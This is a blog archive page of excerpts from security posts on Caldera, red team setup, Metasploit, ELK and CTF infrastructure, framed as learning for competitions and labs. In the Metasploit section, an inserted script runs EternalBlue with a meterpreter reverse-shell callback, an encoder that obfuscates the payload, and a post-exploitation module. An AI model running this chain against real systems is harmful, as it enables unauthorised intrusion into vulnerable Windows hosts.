Category Archives: ForFunAndWumbos

Install/Setup MITRE Caldera the automated cyber adversary emulation system

In this blog post I will be covering how to set up and use MITRE’s new tool, Caldera. Caldera is a cyber adversary emulation system that operates on a server/agent model: on the server you create adversary campaigns that are deployed to your agents, and the agents periodically call back with their results and progress. Let’s begin!

Part 3: How to Red Team – Setting up a red team infrastructure

In this post I thought I would demonstrate how to set up an environment for a red teamer. PLEASE take this environment with a grain of salt, because everyone will have a different setup!!! This guide shows the basics and, hopefully, a template based on the Armitage/Cobalt Strike architecture. If you’re interested in the pinnacle of red team setups, take a look at Alex Levinson’s post about the CCDC Red Team or the blog Room 362 by Rob Fuller.

Creating a macOS VM on VMware Fusion

I had no idea that Mac OS X users had the ability to create Mac OS X VMs with VMware Fusion. Say that last part five times fast lol. I am going to walk you through the process of creating a macOS (Sierra) VM on my laptop. I would like to give original credit to VMware, but I want to share this with my readers. The ability to create Mac OS X VMs allows me to analyze Mac OS X malware in a safe environment, whoop whoop.

Part 2: How to Red Team – Metasploit Framework

In this post I am going to briefly cover the exploitation process with the Metasploit framework. A framework is defined as a real or conceptual structure intended to serve as a support or guide for the building of something that expands the structure into something useful. The Metasploit framework allows red teamers to configure an exploit, choose a payload, pick an encoding technique to obfuscate that payload, and run post-exploitation modules after access is gained. The next couple of sections walk through that process step by step. I believe the Metasploit approach is a template worth knowing because other frameworks and tools follow the same flow.
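
The flow described above, written out as an msfconsole resource script so the four steps (exploit, payload, encoder, post module) run as one repeatable sequence. This is an added example, not code from the original post: the exploit module, the post module, the addresses and the port are assumed lab values that the page does not mention, and you would substitute the module and payload that fit the target you are authorised to test.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): the Metasploit flow as an
# msfconsole resource script. Module names, hosts and ports below are
# ASSUMED lab values; replace them with your own authorised target.
set -eu

# write_rc PATH RHOSTS LHOST: writes the resource script to PATH and echoes PATH.
write_rc() {
    rc="$1"; rhost="$2"; lhost="$3"
    cat > "$rc" <<EOF
# 1. configure the exploit (assumed lab target: a host vulnerable to MS17-010)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $rhost
# 2. choose the payload and where it calls back
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT 4444
# 3. obfuscate the second stage with an encoder
set EnableStageEncoding true
set StageEncoder x64/xor
# -z: do not drop into the session, so the script keeps executing
exploit -z
# 4. post-exploitation against the session that just opened
use post/windows/gather/enum_logged_on_users
set SESSION 1
run
EOF
    echo "$rc"
}

RC_FILE=$(write_rc "${TMPDIR:-/tmp}/redteam_demo.rc" 10.0.0.5 10.0.0.2)

# Only launch msfconsole when it is installed; otherwise just report the file.
if command -v msfconsole >/dev/null 2>&1; then
    msfconsole -q -r "$RC_FILE"
else
    echo "msfconsole not found; resource script written to $RC_FILE"
fi
```

Keeping the sequence in a resource script (`msfconsole -r file.rc`) means the same exploit, payload and post-exploitation choices can be replayed against each target during a competition instead of being retyped at the console.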

Part 1: How to Red Team – Scanning and Enumeration

I have to be honest that my red team skills could use some improvement. I firmly believe that red teaming is a skill and a mindset that people have. I believe some people are naturally born with this mindset and others develop it; I am a developer :). Currently, I am aspiring to become an incident responder because the thrill of the hunt seems like A LOT of fun to me. But to be an effective incident responder I have to understand my adversary and their strategies.

This blog post series will include my approach to learning how to become a red teamer in a competition type of environment. My reasoning for this is that, as a college student, I have the ability to compete in multiple competitions as a red teamer. Additionally, I hope to periodically return to these posts and update them with new tactics and tools that I find and use.

Intro to the ELK Stack on CentOS 7

This is a two-part series on setting up an ELK stack to receive syslog and, in the next post, Bro logs. The ELK stack is an awesome collection of software but a complicated MumboJumboCombo of components. I wanted to help break that barrier for beginners and to help explain how each component works. So stick with me on this two-part series! I would like to give credit to the DigitalOcean post writer for the ELK stack write-up which I’ll be referencing. Additionally, my GitHub contains a script to set up the ELK stack on CentOS 7 64-bit based on the guide below.

RC3 Fall 2016 CTF Infrastructure

In this blog post I will be walking you through how I set up my club’s CTF infrastructure on AWS. I take great pride as the RC3 CTF infrastructure captain (with a bit of an inflated ego 🙂 ) that my infrastructure as a whole never had any downtime! Additionally, our CTF attracted 1,000 users over the course of a weekend, which was a great stress test for the infrastructure.

This post covers the following AWS services: EC2, S3, VPCs, Route 53, RDS, and IAM. Our infrastructure utilized software and services such as CentOS, Ubuntu, HAProxy, Let’s Encrypt, CTFd, Bro, and Nginx/uWSGI. Please keep in mind this guide is a sysadmin guide and not a security guide. Some of the security measures implemented in the infrastructure have been left out of this guide to make it harder for individuals to take advantage of this build in the future. Without further ado, here we go on the wild ride of creating a CTF cloud computing infrastructure in Amazon Web Services (AWS) :).
